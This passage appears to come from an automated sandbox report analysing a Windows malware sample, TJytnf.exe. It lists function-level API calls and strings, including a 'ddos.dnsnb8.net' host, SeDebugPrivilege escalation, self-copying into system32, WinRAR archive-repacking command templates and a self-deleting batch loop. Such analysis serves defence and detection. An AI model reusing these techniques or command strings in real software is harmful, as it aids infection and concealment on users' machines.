CreateThread.KERNEL32(00000000,00000000,00F71099,00000000,00000000,00000000), ref: 00F716AC
WaitForSingleObject.KERNEL32(00000000,000000FF,00000000), ref: 00F716BD

Part of subcall function 00F7139F: GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user~1\AppData\Local\Temp\TJytnf.exe), ref: 00F713BC
Part of subcall function 00F7139F: LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00F713DA
Part of subcall function 00F7139F: GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00F71448

lstrcpy.KERNEL32(?,C:\Users\user~1\AppData\Local\Temp\TJytnf.exe), ref: 00F716E5

Strings

C:\Users\user~1\AppData\Local\Temp\TJytnf.exe, xrefs: 00F71662, 00F71667, 00F716DD
C:\Windows\system32, xrefs: 00F71656
Documents and Settings, xrefs: 00F71696
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00F71644

Memory Dump Source

Source File: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true

Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd

Similarity

API ID: CreateCurrentDirectoryFileLookupModuleNameObjectPathPrivilegeProcessSingleSystemTempThreadValueVersionWaitlstrcpy
String ID: C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\TJytnf.exe$C:\Windows\system32$Documents and Settings
API String ID: 123563730-2403892175
Opcode ID: 1de19b7fd6af0ca2aef027ee50dfd559337c35d19525faac144a57279cec997f
Instruction ID: 2853a557a92680c767bacb6038ae3331798bb440029440c1c9c4368df9ed6556
Opcode Fuzzy Hash: 1de19b7fd6af0ca2aef027ee50dfd559337c35d19525faac144a57279cec997f
Instruction Fuzzy Hash: AD11B972541128BFDB215BA8AD4DE9B3E6DFB55365F008013F20D91061C7748994F7A3

Function 00F71000 Relevance: 15.8, APIs: 7, Strings: 2, Instructions: 60
fileCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateFileA.KERNEL32(00000003,C0000000,00000003,00000000,00000003,00000080,00000000,?,http://%s:%d/%s/%s,00F710E8,?), ref: 00F71018
GetFileSize.KERNEL32(00000000,00000000,ddos.dnsnb8.net,75A38400,?,http://%s:%d/%s/%s,00F710E8,?), ref: 00F71029
CreateFileMappingA.KERNEL32(00000000,00000000,00000004,00000000,00000000,00000000), ref: 00F71038
MapViewOfFile.KERNEL32(00000000,000F001F,00000000,00000000,00000000,?,http://%s:%d/%s/%s,00F710E8,?), ref: 00F7104B
UnmapViewOfFile.KERNEL32(00000000,?,http://%s:%d/%s/%s,00F710E8,?), ref: 00F71075
CloseHandle.KERNEL32(?,?,http://%s:%d/%s/%s,00F710E8,?), ref: 00F7108B
CloseHandle.KERNEL32(00000000,?,http://%s:%d/%s/%s,00F710E8,?), ref: 00F7108E

Strings

ddos.dnsnb8.net, xrefs: 00F71026
http://%s:%d/%s/%s, xrefs: 00F71000

Memory Dump Source

Source File: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true

Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd

Similarity

API ID: File$CloseCreateHandleView$MappingSizeUnmap
String ID: ddos.dnsnb8.net$http://%s:%d/%s/%s
API String ID: 1223616889-3273462101
Opcode ID: 1323a32766672ac58c78da3d36d1b092ca27581cb34168e292feb9abd4838dab
Instruction ID: 36fe812145abfd8f3fd41aa35e3d694ccd94166a215a86ac3156c1e02675af9d
Opcode Fuzzy Hash: 1323a32766672ac58c78da3d36d1b092ca27581cb34168e292feb9abd4838dab
Instruction Fuzzy Hash: A901447150025DBFE7305F649C88E2BBBACEB447ADF01452AF649A2190D6705E88AB62

Function 00F72C48 Relevance: 8.8, APIs: 4, Strings: 1, Instructions: 50
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00F72C57

Part of subcall function 00F71973: PathFileExistsA.SHLWAPI(00F74E5C,00000000,C:\Users\user~1\AppData\Local\Temp\TJytnf.exe), ref: 00F71992
Part of subcall function 00F71973: CreateFileA.KERNEL32(00F74E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00F719BA
Part of subcall function 00F71973: Sleep.KERNEL32(00000064), ref: 00F719C6
Part of subcall function 00F71973: wsprintfA.USER32 ref: 00F719EC
Part of subcall function 00F71973: CopyFileA.KERNEL32(00F74E5C,?,00000000), ref: 00F71A00
Part of subcall function 00F71973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F71A1E
Part of subcall function 00F71973: GetFileSize.KERNEL32(00F74E5C,00000000), ref: 00F71A2C
Part of subcall function 00F71973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00F71A46
Part of subcall function 00F71973: ReadFile.KERNEL32(00F74E5C,00F74E60,00000000,?,00000000), ref: 00F71A65

CreateThread.KERNEL32(00000000,00000000,00F72B8C,00000000,00000000,00000000), ref: 00F72C99
WaitForMultipleObjects.KERNEL32(00000001,00F716BA,00000001,000000FF,?,00F716BA,00000000), ref: 00F72CAC
VirtualFree.KERNEL32(01350000,00000000,00008000,C:\Users\user~1\AppData\Local\Temp\TJytnf.exe,00F74E5C,00F74E60,?,00F716BA,00000000), ref: 00F72CC2

Strings

C:\Users\user~1\AppData\Local\Temp\TJytnf.exe, xrefs: 00F72C69

Memory Dump Source

Source File: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true

Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd

Similarity

API ID: File$Create$Virtual$AllocCopyExistsFreeMultipleObjectsPathReadSizeSleepThreadWaitmemsetwsprintf
String ID: C:\Users\user~1\AppData\Local\Temp\TJytnf.exe
API String ID: 2042498389-2026954911
Opcode ID: dc8c779951f9e9e9c3a69bb9f25e3099c24e885c7703249f3a7c4fb5f9d5040d
Instruction ID: a275c8877cae0efc54bfc978d273f111d201bdf2e70c207b042cd4950efcfa70
Opcode Fuzzy Hash: dc8c779951f9e9e9c3a69bb9f25e3099c24e885c7703249f3a7c4fb5f9d5040d
Instruction Fuzzy Hash: D101D4716012247BD71097949C1AE9F7E6CEF11B70F008022B61CD61C1D7A0E980E3F3

Function 00F714E1 Relevance: 4.6, APIs: 3, Instructions: 55
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleA.KERNEL32(00000000), ref: 00F71504
VirtualQuery.KERNEL32(00F714E1,?,0000001C), ref: 00F71525
ExitProcess.KERNEL32 ref: 00F7157A

Memory Dump Source

Source File: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true

Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd

Similarity

API ID: ExitHandleModuleProcessQueryVirtual
String ID:
API String ID: 3946701194-0
Opcode ID: b30f4b2823182ff1ccc2c3d9952353859b84c1c37f78aeba583a88263829c7f5
Instruction ID: 2a9f7fb6c43b00a6cd30e2d12b84c169f87cfcb05d8e801ce11f4687aedcdb70
Opcode Fuzzy Hash: b30f4b2823182ff1ccc2c3d9952353859b84c1c37f78aeba583a88263829c7f5
Instruction Fuzzy Hash: 74115171D40208EFDB20DF69AC8567977BCF784724B14802BF84AD2250D334A995BB53

Function 00F71915 Relevance: 4.5, APIs: 3, Instructions: 41
timeCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

memset.MSVCRT ref: 00F71933
GetFileTime.KERNEL32(000000FF,?,?,?), ref: 00F71947

Memory Dump Source

Source File: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true

Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd

Similarity

API ID: FileTimememset
String ID:
API String ID: 176422537-0
Opcode ID: bfc63317ad88ac2e50b9604f644217e920e0f604ea8709704d1ae34a26e2bf40
Instruction ID: e7120622e7baaf8df5773af39e7d06dadaeb9ffae7e5779c4586e0f5927c15f3
Opcode Fuzzy Hash: bfc63317ad88ac2e50b9604f644217e920e0f604ea8709704d1ae34a26e2bf40
Instruction Fuzzy Hash: 93F04432600209BBD7209E2ADC04BA777BDBB50365F00C537F65ED1050E730D64AEBA2

Function 00F7615D Relevance: 2.6, APIs: 2, Instructions: 55
memoryCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

VirtualAlloc.KERNEL32(00000000,?,00001000,00000004,?,?,?), ref: 00F760DF
VirtualFree.KERNELBASE(?,00000000,00008000,?,?,?), ref: 00F76189
VirtualFree.KERNELBASE(?,00000000,00008000), ref: 00F761A5

Memory Dump Source

Source File: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true

Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd

Similarity

API ID: Virtual$Free$Alloc
String ID:
API String ID: 1852963964-0
Opcode ID: 2c89c0d4c07887ec9144e1f2f4c42164e871db1d9a3d4648a870348dafa0d5ea
Instruction ID: 56ec7a237de466ff92c3d53d67a3e79835635ad010f9f3f896d379af4d637475
Opcode Fuzzy Hash: 2c89c0d4c07887ec9144e1f2f4c42164e871db1d9a3d4648a870348dafa0d5ea
Instruction Fuzzy Hash: B311BF32A00A48CFCF718E58CC853DD37A1FF04310F69801ADE4D9B252DA712940DB85

Non-executed Functions

Function 00F7119F Relevance: 10.5, APIs: 5, Strings: 1, Instructions: 40COMMON

Download Yara Rule

APIs

GetCurrentProcess.KERNEL32(C:\Users\user~1\AppData\Local\Temp\TJytnf.exe,?,?,?,?,?,?,00F713EF), ref: 00F711AB
OpenProcessToken.ADVAPI32(00000000,00000028,00F713EF,?,?,?,?,?,?,00F713EF), ref: 00F711BB
AdjustTokenPrivileges.ADVAPI32(00F713EF,00000000,?,00000010,00000000,00000000), ref: 00F711EB
CloseHandle.KERNEL32(00F713EF), ref: 00F711FA
CloseHandle.KERNEL32(?,?,?,?,?,?,?,00F713EF), ref: 00F71203

Strings

C:\Users\user~1\AppData\Local\Temp\TJytnf.exe, xrefs: 00F711A5

Memory Dump Source

Source File: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true

Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd

Similarity

API ID: CloseHandleProcessToken$AdjustCurrentOpenPrivileges
String ID: C:\Users\user~1\AppData\Local\Temp\TJytnf.exe
API String ID: 75692138-2026954911
Opcode ID: 6aba40e7ce2d4744a71ffefc6e7c04212951ede9235829054106a99ddb9e506f
Instruction ID: 0c71a9da62d6e47374f912b062b9e674944a8c4c88fa1e4311d4c706d7992531
Opcode Fuzzy Hash: 6aba40e7ce2d4744a71ffefc6e7c04212951ede9235829054106a99ddb9e506f
Instruction Fuzzy Hash: EC01E87590020DFFDB00DFD4CD89AAEBBB8FB04309F104469E609A2151D7715F84AB51

Function 00F7139F Relevance: 8.9, APIs: 3, Strings: 2, Instructions: 109COMMON

Download Yara Rule

APIs

GetVersionExA.KERNEL32(?,?,00000104,C:\Users\user~1\AppData\Local\Temp\TJytnf.exe), ref: 00F713BC
LookupPrivilegeValueA.ADVAPI32(00000000,SeDebugPrivilege,?), ref: 00F713DA
GetCurrentProcessId.KERNEL32(-00000094,0000000C,0000000C,00000001), ref: 00F71448

Part of subcall function 00F7119F: GetCurrentProcess.KERNEL32(C:\Users\user~1\AppData\Local\Temp\TJytnf.exe,?,?,?,?,?,?,00F713EF), ref: 00F711AB
Part of subcall function 00F7119F: OpenProcessToken.ADVAPI32(00000000,00000028,00F713EF,?,?,?,?,?,?,00F713EF), ref: 00F711BB
Part of subcall function 00F7119F: AdjustTokenPrivileges.ADVAPI32(00F713EF,00000000,?,00000010,00000000,00000000), ref: 00F711EB
Part of subcall function 00F7119F: CloseHandle.KERNEL32(00F713EF), ref: 00F711FA
Part of subcall function 00F7119F: CloseHandle.KERNEL32(?,?,?,?,?,?,?,00F713EF), ref: 00F71203

Strings

C:\Users\user~1\AppData\Local\Temp\TJytnf.exe, xrefs: 00F713A8
SeDebugPrivilege, xrefs: 00F713D3

Memory Dump Source

Source File: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true

Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd

Similarity

API ID: Process$CloseCurrentHandleToken$AdjustLookupOpenPrivilegePrivilegesValueVersion
String ID: C:\Users\user~1\AppData\Local\Temp\TJytnf.exe$SeDebugPrivilege
API String ID: 4123949106-3281114557
Opcode ID: a850a4848267a1d77716f4130a93c004ce875276418c8f2c7c49cd500addbd3a
Instruction ID: 033af06fedf2a8fddcca4fc6aeaa8505f3c8875edd6b7d343771c861e348b043
Opcode Fuzzy Hash: a850a4848267a1d77716f4130a93c004ce875276418c8f2c7c49cd500addbd3a
Instruction Fuzzy Hash: DA316472D0020DAAEF60DFA99C45FDE7B78FB45714F10806BE608B2141D6745E49EB62

Function 00F7239D Relevance: 56.2, APIs: 26, Strings: 6, Instructions: 239sleepfilestringCOMMON

Download Yara Rule

APIs

strstr.MSVCRT ref: 00F723CC
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00F72464
GetFileSize.KERNEL32(00000000,00000000), ref: 00F72472
CloseHandle.KERNEL32(?,00000000,00000000), ref: 00F724A8
memset.MSVCRT ref: 00F724B9
strrchr.MSVCRT ref: 00F724C9
wsprintfA.USER32 ref: 00F724DE
strrchr.MSVCRT ref: 00F724ED
memset.MSVCRT ref: 00F724F2
memset.MSVCRT ref: 00F72505
wsprintfA.USER32 ref: 00F72524
Sleep.KERNEL32(000007D0), ref: 00F72535
Sleep.KERNEL32(000007D0), ref: 00F7255D
memset.MSVCRT ref: 00F7256E
wsprintfA.USER32 ref: 00F72585
memset.MSVCRT ref: 00F725A6
wsprintfA.USER32 ref: 00F725CA
Sleep.KERNEL32(000007D0), ref: 00F725D0
Sleep.KERNEL32(000007D0,?,?), ref: 00F725E5
CreateFileA.KERNEL32(?,C0000000,00000003,00000000,00000003,00000080,00000000), ref: 00F725FC
CloseHandle.KERNEL32(00000000,00000000,00000001), ref: 00F72611
SetFilePointer.KERNEL32(FFFFFFFF,?,00000000,00000000), ref: 00F72642
WriteFile.KERNEL32(?,00000006,?,00000000), ref: 00F7265B
SetEndOfFile.KERNEL32 ref: 00F7266D
CloseHandle.KERNEL32(00000000), ref: 00F72676
RemoveDirectoryA.KERNEL32(?), ref: 00F72681

Strings

%s X -ibck "%s" "%s\", xrefs: 00F7251E
%s\, xrefs: 00F7257F
%s%s, xrefs: 00F724D8
-ibck, xrefs: 00F725BA
%s M %s -r -o+ -ep1 "%s" "%s\*", xrefs: 00F725C4
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00F723B1, 00F723B6, 00F724CD

Memory Dump Source

Source File: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true

Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd

Similarity

API ID: File$memset$Sleepwsprintf$CloseHandle$Createstrrchr$DirectoryPointerRemoveSizeWritestrstr
String ID: %s M %s -r -o+ -ep1 "%s" "%s\*"$%s X -ibck "%s" "%s\"$%s%s$%s\$-ibck$C:\Users\user~1\AppData\Local\Temp\
API String ID: 2203340711-1252250577
Opcode ID: eae0302bc899303565b9d05bc27dae53f0b64cd147eb6b96ced05e03939ca9fa
Instruction ID: c31b621b4a2a63149bf94af31c64903fd0332c99ab7f3852e0f65b0d84d9f2d2
Opcode Fuzzy Hash: eae0302bc899303565b9d05bc27dae53f0b64cd147eb6b96ced05e03939ca9fa
Instruction Fuzzy Hash: CD818FB1504348BBD710DF64DC89EABB7ACFB88714F00851BF688D2190D774DA89AB67

Function 00F7274A Relevance: 28.1, APIs: 9, Strings: 7, Instructions: 83fileCOMMON

Download Yara Rule

APIs

memset.MSVCRT ref: 00F72766
memset.MSVCRT ref: 00F72774
SHGetSpecialFolderPathA.SHELL32(00000000,?,00000026,00000000), ref: 00F72787
wsprintfA.USER32 ref: 00F727AB

Part of subcall function 00F7185B: GetSystemTimeAsFileTime.KERNEL32(00F71F92,00000000,?,00000000,?,?,?,00F71F92,?,00000000,00000002), ref: 00F71867
Part of subcall function 00F7185B: srand.MSVCRT ref: 00F71878
Part of subcall function 00F7185B: rand.MSVCRT ref: 00F71880
Part of subcall function 00F7185B: srand.MSVCRT ref: 00F71890
Part of subcall function 00F7185B: rand.MSVCRT ref: 00F71894

wsprintfA.USER32 ref: 00F727C6
CopyFileA.KERNEL32(?,00F74C80,00000000), ref: 00F727D4
wsprintfA.USER32 ref: 00F727F4

Part of subcall function 00F71973: PathFileExistsA.SHLWAPI(00F74E5C,00000000,C:\Users\user~1\AppData\Local\Temp\TJytnf.exe), ref: 00F71992
Part of subcall function 00F71973: CreateFileA.KERNEL32(00F74E5C,80000000,00000001,00000000,00000003,00000000,00000000,00000000), ref: 00F719BA
Part of subcall function 00F71973: Sleep.KERNEL32(00000064), ref: 00F719C6
Part of subcall function 00F71973: wsprintfA.USER32 ref: 00F719EC
Part of subcall function 00F71973: CopyFileA.KERNEL32(00F74E5C,?,00000000), ref: 00F71A00
Part of subcall function 00F71973: CreateFileA.KERNEL32(?,80000000,00000001,00000000,00000003,00000000,00000000), ref: 00F71A1E
Part of subcall function 00F71973: GetFileSize.KERNEL32(00F74E5C,00000000), ref: 00F71A2C
Part of subcall function 00F71973: VirtualAlloc.KERNEL32(00000000,00000000,00003000,00000004), ref: 00F71A46
Part of subcall function 00F71973: ReadFile.KERNEL32(00F74E5C,00F74E60,00000000,?,00000000), ref: 00F71A65

DeleteFileA.KERNEL32(?,?,00F74E54,00F74E58), ref: 00F7281A
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000004,00000000,00000000,?,00F74E54,00F74E58), ref: 00F72832

Strings

C:\Windows\system32, xrefs: 00F727E3
\WinRAR\Rar.exe, xrefs: 00F72793
%s\%s, xrefs: 00F727EE
%s%s, xrefs: 00F727A5
%s%.8x.exe, xrefs: 00F727BB
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00F727B6
c_31892.nls, xrefs: 00F727DE

Memory Dump Source

Source File: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true

Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd

Similarity

API ID: File$wsprintf$Create$CopyPathTimememsetrandsrand$AllocDeleteExistsFolderReadSizeSleepSpecialSystemVirtual
String ID: %s%.8x.exe$%s%s$%s\%s$C:\Users\user~1\AppData\Local\Temp\$C:\Windows\system32$\WinRAR\Rar.exe$c_31892.nls
API String ID: 692489704-4282063453
Opcode ID: a3d0564127ac7ee85256db81c9fa5438cccefbcd5c68a5c41033f19d3fa11cc0
Instruction ID: c723e8fd98957b4f63aa17dff0542b390b9280e6a519889d6f1b013a30df4889
Opcode Fuzzy Hash: a3d0564127ac7ee85256db81c9fa5438cccefbcd5c68a5c41033f19d3fa11cc0
Instruction Fuzzy Hash: 612165B6D4021C7BEB10E7A49C89FDB736CEB14754F0045A3B65CE2052E674EF84AA63

Function 00F71581 Relevance: 21.1, APIs: 7, Strings: 5, Instructions: 67filestringCOMMON

Download Yara Rule

APIs

Part of subcall function 00F7185B: GetSystemTimeAsFileTime.KERNEL32(00F71F92,00000000,?,00000000,?,?,?,00F71F92,?,00000000,00000002), ref: 00F71867
Part of subcall function 00F7185B: srand.MSVCRT ref: 00F71878
Part of subcall function 00F7185B: rand.MSVCRT ref: 00F71880
Part of subcall function 00F7185B: srand.MSVCRT ref: 00F71890
Part of subcall function 00F7185B: rand.MSVCRT ref: 00F71894

wsprintfA.USER32 ref: 00F715AA
wsprintfA.USER32 ref: 00F715C6
lstrlen.KERNEL32(?), ref: 00F715D2
CreateFileA.KERNEL32(?,C0000000,00000000,00000000,00000002,00000000,00000000), ref: 00F715EE
WriteFile.KERNEL32(00000000,?,00000000,00000001,00000000), ref: 00F71609
CloseHandle.KERNEL32(00000000), ref: 00F71612
ShellExecuteA.SHELL32(00000000,open,?,00000000,00000000,00000000), ref: 00F7162D

Strings

C:\Users\user~1\AppData\Local\Temp\TJytnf.exe, xrefs: 00F7158A, 00F715B3, 00F715B8, 00F715B9
open, xrefs: 00F71627
:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s", xrefs: 00F715C0
%s%.8x.bat, xrefs: 00F715A4
C:\Users\user~1\AppData\Local\Temp\, xrefs: 00F71599

Memory Dump Source

Source File: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true

Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd

Similarity

API ID: File$Timerandsrandwsprintf$CloseCreateExecuteHandleShellSystemWritelstrlen
String ID: %s%.8x.bat$:DELFILEdel "%s"if exist "%s" goto :DELFILEdel "%s"$C:\Users\user~1\AppData\Local\Temp\$C:\Users\user~1\AppData\Local\Temp\TJytnf.exe$open
API String ID: 617340118-1710932710
Opcode ID: 9e80467f80d44918437ca208b44d5f8a4eca2c917899a4d6f56acdedae1a0572
Instruction ID: 84422179cab4ef1a4e0b088fa0038ee49d95fd0f26cdc28d6d6b15f9f5e5ff48
Opcode Fuzzy Hash: 9e80467f80d44918437ca208b44d5f8a4eca2c917899a4d6f56acdedae1a0572
Instruction Fuzzy Hash: 0B115472A0112CBAD72097A49C89DEB7B6CEF59764F400052F54DE2040DA749BC8ABB3

Function 00F7120E Relevance: 19.3, APIs: 8, Strings: 3, Instructions: 93librarymemoryloaderCOMMON

Download Yara Rule

APIs

GetModuleHandleA.KERNEL32(ntdll.dll,ZwQuerySystemInformation,00000104,?,?,?,?,00F71400), ref: 00F71226
GetProcAddress.KERNEL32(00000000), ref: 00F7122D
GetCurrentProcessId.KERNEL32(?,?,?,?,00F71400), ref: 00F7123F
OpenProcess.KERNEL32(00000400,00000000,00000000,?,?,?,?,00F71400), ref: 00F71250
VirtualFree.KERNEL32(00000000,00000000,00008000,?,C:\Users\user~1\AppData\Local\Temp\TJytnf.exe,?,?,?,?,00F71400), ref: 00F7129E
VirtualAlloc.KERNEL32(00000000,00050000,00003000,00000004,00000001,?,C:\Users\user~1\AppData\Local\Temp\TJytnf.exe,?,?,?,?,00F71400), ref: 00F712B0
CloseHandle.KERNEL32(?,?,C:\Users\user~1\AppData\Local\Temp\TJytnf.exe,?,?,?,?,00F71400), ref: 00F712F5
VirtualFree.KERNEL32(00000000,00000000,00008000,?,?,?,00F71400), ref: 00F7130A

Strings

ntdll.dll, xrefs: 00F71219
C:\Users\user~1\AppData\Local\Temp\TJytnf.exe, xrefs: 00F71262
ZwQuerySystemInformation, xrefs: 00F71212

Memory Dump Source

Source File: 00000005.00000002.1847078742.0000000000F71000.00000020.00000001.01000000.00000004.sdmp, Offset: 00F70000, based on PE: true

Associated: 00000005.00000002.1847057634.0000000000F70000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847102783.0000000000F73000.00000002.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847206835.0000000000F74000.00000004.00000001.01000000.00000004.sdmpDownload File
Associated: 00000005.00000002.1847277915.0000000000F76000.00000040.00000001.01000000.00000004.sdmpDownload File

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_5_2_f70000_TJytnf.jbxd

Similarity

API ID: Virtual$FreeHandleProcess$AddressAllocCloseCurrentModuleOpenProc
String ID: C:\Users\user~1\AppData\Local\Temp\TJytnf.exe$ZwQuerySystemInformation$ntdll.dll
API String ID: 1500695312-755741500
Opcode ID: c984c7ff96a1958d6d50b74c6d94634f8bc63a62091fa11b82ec1bc218e0694b
Instruction ID: 12a306e358085ea61a04b668601266a3b20357da50ec4f79ec8eb44da977bcb8
Opcode Fuzzy Hash: c984c7ff96a1958d6d50b74c6d94634f8bc63a62091fa11b82ec1bc218e0694b
Instruction Fuzzy Hash: 60212731B04311BBD7209F58DC08B6BBAA8FB45B10F10491AF54DD6241C370D988F7A7

Function 00F72692 Relevance: 12.1, APIs: 8, Instructions: 64stringsynchronizationCOMMON

Download Yara Rule

APIs

CreateEventA.KERNEL32(00000000,00000000,00000001,00000000,771AE800,?,?,00F729DB,?,00000001), ref: 00F726A7
WaitForSingleObject.KERNEL32(00000000,000000FF,771AE800,?,?,00F729DB,?,00000001), ref: 00F726B5
lstrlen.KERNEL32(?), ref: 00F726C4
??2@YAPAXI@Z.MSVCRT ref: 00F726CE
lstrcpy.KERNEL32(00000004,?), ref: 00F726E3
lstrcpy.KERNEL32(?,00000004), ref: 00F7271F
??3@YAXPAX@Z.MSVCRT ref: 00F7272D
SetEvent.KERNEL32 ref: 00F7273C

Memory Dump Source

